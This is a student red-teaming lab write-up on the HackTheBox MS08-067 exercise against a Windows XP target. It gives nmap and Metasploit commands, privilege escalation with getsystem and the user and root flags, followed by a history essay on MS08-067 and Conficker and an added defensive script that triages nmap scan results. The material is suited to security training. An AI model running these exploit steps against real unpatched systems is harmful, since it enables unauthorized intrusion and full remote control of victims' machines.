Week 1 MS08-067 Lab PDF

Title Week 1 MS08-067 Lab
Course Red Teaming
Institution National University (US)
Pages 9
File Size 405.9 KB
File Type PDF

Summary

MS08-067 is a remote code execution vulnerability that took the world by storm when it hit windows systems in 2008. The famous exploit, which targeted Windows XP machines, allowed attackers to get direct access to vulnerable hosts and completely control targets remotely.
This lab, found in the...


Description

6/6/2021 CYB 633

Requirements
● Screenshots to help illustrate answers to questions.
● Answer questions with full sentences.

Introduction

This is a HackTheBox lab that takes advantage of an old Windows vulnerability MS08-067 on a Windows XP machine. It starts off by enumerating the vulnerability with Nmap, then runs Metasploit to execute the exploit, establish a connection, and then create a shell. From there, I search the machine for a flag in a specific file, demonstrating I have access to the user. I then go back to the meterpreter console, grant myself admin privileges, create another shell, and search for the root flag, which demonstrates I have access to the administrator account. After this, I create an essay that discusses the history of MS08-067.

1. Gaining Access

I had problems enumerating the vulnerability. I discussed them with you over email. I am not sure if the problem was at my end or theirs, but I was finally able to get it.

sudo nmap --script smb-vuln-ms08-067.nse -p 445 10.10.10.4

When I was finally able to enumerate the vulnerability, I had problems exploiting it. When I was able to enumerate the vulnerability, I would run Metasploit and try to exploit it. It would fail and I would exit; when I attempted to enumerate the vulnerability again, port 445 would show as filtered. I do not know what the problem was. I do not see how it could have been on my end, considering this also happened on PwnBox. I did end up getting it done the OpenVPN way.

sudo msfdb run
use exploit/windows/smb/ms08_067_netapi
set rhosts 10.10.10.4
set lhost tun0
exploit

getuid
shell

1. What is the user.txt flag? The user.txt flag is “e69af0e4f443de7e36876fda4ec7644f” (without the quotes). Here I went to the root directory and searched all subdirectories for “user.txt” because I was not sure where it was.

cd\
dir user.txt /s
cd\Documents and Settings\john\Desktop
type user.txt

2. Privilege Escalation

1. What is the root.txt flag? The root flag is “993442d258b0e0ec917cae9e695d5713” (without the quotes). I had to go back to meterpreter to get admin privileges and then execute another shell. Then, I did the same thing as before, going to the root directory and searching its subdirectories for “root.txt”.

getsystem
shell
cd\
dir root.txt /s
cd\Documents and Settings\Administrator\Desktop
type root.txt
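The enumeration step in part 1 is also the defender's view of this bug: the same nmap check, run across a subnet, is how an asset owner finds hosts that still need the MS08-067 patch. The script below is an added example, not part of the lab report, that triages nmap normal (-oN) output from the smb-vuln-ms08-067 script into remediation buckets. It handles the situation described in part 1 where port 445 shows as filtered: the NSE script never runs against such a host, so the host must be queued for a rescan rather than counted as safe. The scan text is constructed to mirror the script's output layout (a NOT VULNERABLE block only appears when nmap is run with --script-args vulns.showall=1); the host addresses and the bucket names are this example's own.

```python
"""Triage nmap smb-vuln-ms08-067 results into remediation buckets.

Added example for the lab above, not part of the student's report. It reads
nmap "normal" (-oN) output for the scan command shown in the lab and decides,
per host, whether it needs the MS08-067 patch, is already safe, or needs a
rescan. The sample below is constructed to mirror the NSE script's layout.
"""
import re
from collections import defaultdict

# Constructed sample: four hosts, one per outcome. Not real scan data.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.4
Host is up (0.021s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     Disclosure date: 2008-10-23
|_    References: https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

Nmap scan report for 10.10.10.5
Host is up (0.030s latency).

PORT    STATE    SERVICE
445/tcp filtered microsoft-ds

Nmap scan report for 10.10.10.6
Host is up (0.018s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067:
|   NOT VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|_    State: NOT VULNERABLE

Nmap scan report for 10.10.10.7
Host is up (0.025s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms08-067: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)", re.M)
PORT_RE = re.compile(r"^445/tcp\s+(\w+)", re.M)
# Order matters: "NOT VULNERABLE" must be tried before the bare "VULNERABLE".
STATE_RE = re.compile(r"State:\s+(NOT VULNERABLE|LIKELY VULNERABLE|VULNERABLE)")


def split_hosts(text):
    """Yield (host, report_text) pairs, one per 'Nmap scan report' block."""
    matches = list(HOST_RE.finditer(text))
    for i, m in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(text)
        yield m.group(1), text[m.start():end]


def classify_host(report):
    """Classify one host's report block.

    Returns 'vulnerable', 'not_vulnerable', 'rescan_port_filtered' or
    'rescan_script_failed'. A filtered or closed 445 means the script never
    ran, so the host is unknown, not safe, and stays on the follow-up list.
    """
    state = STATE_RE.search(report)
    if state:
        # LIKELY VULNERABLE is treated as vulnerable for patch prioritisation.
        return "not_vulnerable" if state.group(1) == "NOT VULNERABLE" else "vulnerable"
    port = PORT_RE.search(report)
    if port is None or port.group(1) != "open":
        return "rescan_port_filtered"
    return "rescan_script_failed"


def triage(text):
    """Group hosts in an nmap -oN file by classification."""
    buckets = defaultdict(list)
    for host, report in split_hosts(text):
        buckets[classify_host(report)].append(host)
    return dict(buckets)


if __name__ == "__main__":
    for bucket, hosts in sorted(triage(SAMPLE_SCAN).items()):
        print(f"{bucket:22s} {', '.join(hosts)}")
```

Run against a real file with triage(open("scan.txt").read()); the two rescan buckets are the ones that get lost in practice, because a host that did not answer looks the same as a patched one if only the VULNERABLE lines are grepped.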

3. Paper

For this lab, please submit a 2-3 page paper that discusses the history of MS08-067. The paper should discuss organizations that were affected by the exploit, and how the technology field responded to it. In addition, please be creative in writing about the exploit. Here are some other ideas to ponder and write about:
- Who created the exploit?
- Why are businesses still using Windows XP?
- Have there been any similar exploits since then?
- What country or company was affected the most by MS08-067?

The paper will require APA formatting, and sources should be properly cited both in-text and in the reference section of the paper. The reference section and title page do not count towards the total page count. Please submit the paper portion as “FirstName_LastName_MS08_067.docx”.

History of MS08-067

This essay focuses on the history of MS08-067 rather than the technical details of what it is. Still, it is appropriate to introduce what it is for context. MS08-067 is a remote code execution vulnerability that allows an attacker to run arbitrary code on Windows 2000 Service Pack (SP) 4, Windows XP SP2 and SP3, Windows Server 2003 SP1 and SP2, Windows Vista Gold and SP1, Windows Server 2008, and Windows 7 systems. The Common Vulnerabilities and Exposures (CVE) site identifies this vulnerability as CVE-2008-4250. The Common Vulnerability Scoring System (CVSS) rates it at a 10.0 (Burton, n.d.).

In September 2008, there were reports of hackers from China selling Windows exploit kits that exploited a Windows security flaw and executed a buffer overflow on port 445. The hackers were selling the exploit for $37. There was malware at the time known as Gimmiv that used this very Windows vulnerability, so it is believed that the developers of Gimmiv may have used the exploit sold by these hackers (“Microsoft Volume”, n.d.). Microsoft released a patch for the vulnerability on October 23rd, 2008. Normally Microsoft releases patches on the second Tuesday of each month, known as “Patch Tuesday”, so this was an emergency patch. Since many hackers had become aware of the vulnerability due to the announcement of the emergency patch, they could use it to their advantage to attack machines that had not yet applied it, so the news ended up being a double-edged sword. Windows XP support was discontinued on April 8, 2014. One of the reasons older Windows versions, such as Windows 7 and Windows XP, still exist on many systems in businesses is that those businesses are ineligible for volume licensing (Sanders, 2019). Volume licensing is licensing software in volume, which makes it easier and more affordable to run on multiple computers within a single organization (“Understand Microsoft”, 2021). Some businesses may also have old hardware, such as custom-made devices, security equipment, and network devices, that relies on drivers that were never updated for modern versions of Windows.

MS08-067 is an example of what is called arbitrary code execution (ACE) or remote code execution (RCE). There have been quite a few vulnerabilities like it since MS08-067. One we worked on in the lab was CVE-2014-7169, a remote code execution vulnerability dubbed Shellshock. We also learned about CVE-2017-0144, dubbed EternalBlue, which takes advantage of Microsoft Windows’ Server Message Block (SMB). MS08-067 itself led to the creation of the infamous Conficker worm. Once Conficker infects a system, it disables many of its automatic backup settings and security features, deletes restore points, and opens connections to receive instructions from a remote computer. It propagated to millions of systems over time, and there ended up being multiple variants (Burton, n.d.). The worm still exists to this day, and it is difficult to know its exact damages, but there are some notable reports. The biggest damage estimate I have come across is in the United Kingdom, where the Manchester City Council lost $2.4 million (equivalent in pounds) in Conficker cleanup costs and lost revenue due to downtime (Danchev, 2009). The French Navy was also affected by the worm. They had to cut network connectivity to stop it from spreading on its Intramar network, which stopped email messaging and web browsing. Planes ended up being forced to land (Cenciotti, 2009). The Conficker worm is believed to have originated from Ukrainian cybercriminals. Ukraine disrupted a $72 million Conficker hacking ring in 2011. An international effort led to the arrest of two people who were tied to Latvian gangs. They were charged with wire fraud and computer fraud (Kirk, 2011).

This essay was on the history of MS08-067. I started off by briefly describing what it is, followed by its origins. I could not verify definitively who created it, which makes sense since, as explained in a few of the articles I read, no one would want to be known for it and no one would claim to be the author. It appears to have originated in China, and the Conficker worm in Ukraine. I then talked about the double-edged sword of Microsoft announcing the vulnerability and releasing an emergency patch for it. I discussed why some companies still use old versions of Windows. I described how many computers it may have affected and some of the damage it caused. As described in one article I came across, Conficker is a worm that “just won’t die”. The vulnerability will always exist; the worm does have the potential to go away, but that is not going to happen any time soon.

Burton, K. (n.d.). The Conficker Worm. SANS. Retrieved from https://www.sans.org/securityresources/malwarefaq/conficker-worm

Cenciotti, D. (February 13, 2009). French Navy Rafales Grounded by a Computer Virus. The Aviationist. Retrieved from https://theaviationist.com/2009/02/13/french-navy-rafalesgrounded-bya-computer-virus/

Danchev, D. (July 2, 2009). Manchester City Council Pays $2.4m in Conficker Clean Up Costs. ZDNet. Retrieved from https://www.zdnet.com/article/manchester-city-council-pays-24m-in-conficker-clean-up-costs/

Kirk, J. (June 23, 2011). Update: Ukraine disrupts $72M Conficker hacking ring. Computerworld. Retrieved from https://www.computerworld.com/article/2509397/update-ukraine-disrupts--72m-conficker-hacking-ring.html

Learning from History – The Conficker Outbreak. (n.d.). Cybersecurity Insiders. Retrieved from https://www.cybersecurity-insiders.com/learning-from-history-the-confickeroutbreak/

Microsoft Volume Licensing. (n.d.). Techopedia. Retrieved from https://www.techopedia.com/definition/2554/microsoft-volume-licensing

Sanders, J. (July 30, 2019). It's 2019, and One Third of Businesses Still Have Active Windows XP Deployments. TechRepublic. Retrieved from https://www.techrepublic.com/article/its-2019-and-one-third-of-businesses-still-haveactive-windows-xp-deployments/...

